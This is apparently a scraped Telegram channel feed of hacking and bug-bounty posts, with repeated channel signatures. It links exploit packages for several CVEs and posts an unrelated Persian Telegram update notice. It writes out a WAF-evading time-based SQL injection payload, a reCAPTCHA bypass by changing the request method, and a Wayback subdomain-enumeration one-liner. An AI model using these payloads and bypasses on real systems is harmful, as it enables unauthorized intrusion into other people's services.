CVE-2022-40146_Exploit_Jar-master.zip
5.9 KB
CVE-2022-40146 ( SSRF and RCE Through Remote Class Loading ) Exploit
Link
#Exploit #RCE #SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#Exploit #RCE #SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
❤1
CVE-2021-39144 ( VMware Cloud Foundation RCE vulnerability via XStream )
Github
#RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Not only crawling but you can do Subdomain Enumeration using Wayback.
——————
0Day.Today
@LearnExploit
@Tech_Army
curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty ——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
We have added some adjustments to the payload that may bypass some WAFs & to help you with the hunt!#BugBountyTips
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
cve-2022-3602
cve-2022-3786 / openssl-poc
Github
#Openssl #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
cve-2022-3786 / openssl-poc
Github
#Openssl #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-33679 ( Harmful RC4 and 1day exploit )
Exploit
READ
#windows #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploit
READ
#windows #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
#Quotes
——————
0Day.Today
@LearnExploit
@Tech_Army
V: Tellme, do you know what day it is, Evey?
Evey: November the 4th?
V: Not Anymore
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6❤1
بررسی CVE های پر سر و صدای این هفته (7 تا 13 آبان 1401)
https://vrgl.ir/oyat6
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
https://vrgl.ir/oyat6
#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6
🔶 آپدیت جدید تلگرام منتشر شد .
➕ موضوع در گروهها
در گروههایی که بیشتر از 200 عضو داشته باشند، میتوانید بحثها را به شکل موضوعهای جداگانه ساماندهی کنید. این قابلیت را در @TheForum امتحان کنید.
➕ نامهای کاربری کلکسیونی
در پلتفرم جدید، با استفاده از بلاکچین، نام کاربریهای اضافی را ذخیره کرده و از آنها در پروفایل، گروه یا کانال خود استفاده کنید.
➕ تبدیل صدا به متن در پیامهای ویدیویی
از این پس کاربران پرمیوم میتوانند پیامهای ویدیویی را به متن تبدیل کنند.
➕ واکنشها و ایموجیهای تعاملی بیشتر
از این پس زمانی که در گفتگویهای تک به تک روی ایموجیهای 😴👨💻🤓👀 بزنید، انیمیشنهای تمامصفحه را نمایش داده میشوند. چنانچه تلگرام طرف مقابل باز باشد، انیمیشن بطور همزمان برای او هم نمایش دادهخواهدشد.
همچنین 😴👨💻🤓👀 و 👻🎃😭 هم به عنوان واکنش برای همه کاربران دردسترس خواهند بود.
➕ بستههای اموجی جدید
کاربران پرمیوم به 12 بسته اموجی جدید که توسط هنرمندان تلگرام طراحی شدهاند، دسترسی خواهند داشت.
Read more
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
➕ موضوع در گروهها
در گروههایی که بیشتر از 200 عضو داشته باشند، میتوانید بحثها را به شکل موضوعهای جداگانه ساماندهی کنید. این قابلیت را در @TheForum امتحان کنید.
➕ نامهای کاربری کلکسیونی
در پلتفرم جدید، با استفاده از بلاکچین، نام کاربریهای اضافی را ذخیره کرده و از آنها در پروفایل، گروه یا کانال خود استفاده کنید.
➕ تبدیل صدا به متن در پیامهای ویدیویی
از این پس کاربران پرمیوم میتوانند پیامهای ویدیویی را به متن تبدیل کنند.
➕ واکنشها و ایموجیهای تعاملی بیشتر
از این پس زمانی که در گفتگویهای تک به تک روی ایموجیهای 😴👨💻🤓👀 بزنید، انیمیشنهای تمامصفحه را نمایش داده میشوند. چنانچه تلگرام طرف مقابل باز باشد، انیمیشن بطور همزمان برای او هم نمایش دادهخواهدشد.
همچنین 😴👨💻🤓👀 و 👻🎃😭 هم به عنوان واکنش برای همه کاربران دردسترس خواهند بود.
➕ بستههای اموجی جدید
کاربران پرمیوم به 12 بسته اموجی جدید که توسط هنرمندان تلگرام طراحی شدهاند، دسترسی خواهند داشت.
Read more
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
Telegram
موضوع در گروهها، نامهای کاربری کلکسیونی، تبدیل پیامهای ویدیویی به متن و موارد بیشتر
در بهروزرسانی امروز، قابلیت افزودن موضوع برای مدیریت بهتر بحثها در گروههای بزرگ، نوع جدیدی از نام کاربریهای امن بر بستر بلاکچین، گزینهای برای تبدیل پیامهای ویدیویی به متن و… به تلگرام اضافه خواهند شد.
👍3🤔1
پیرو صورتجلسه محرمانهی گروه اصلی طرح صیانت (از جمله وزیر فعلی دولت آقای دکتر رئیسی و وزیر دولت آقای دکتر احمدینژاد)
OFFSEC
——————
0Day.Today
@LearnExploit
@Tech_Army
OFFSEC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6
Bypass Captcha (Google reCAPTCHA)
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5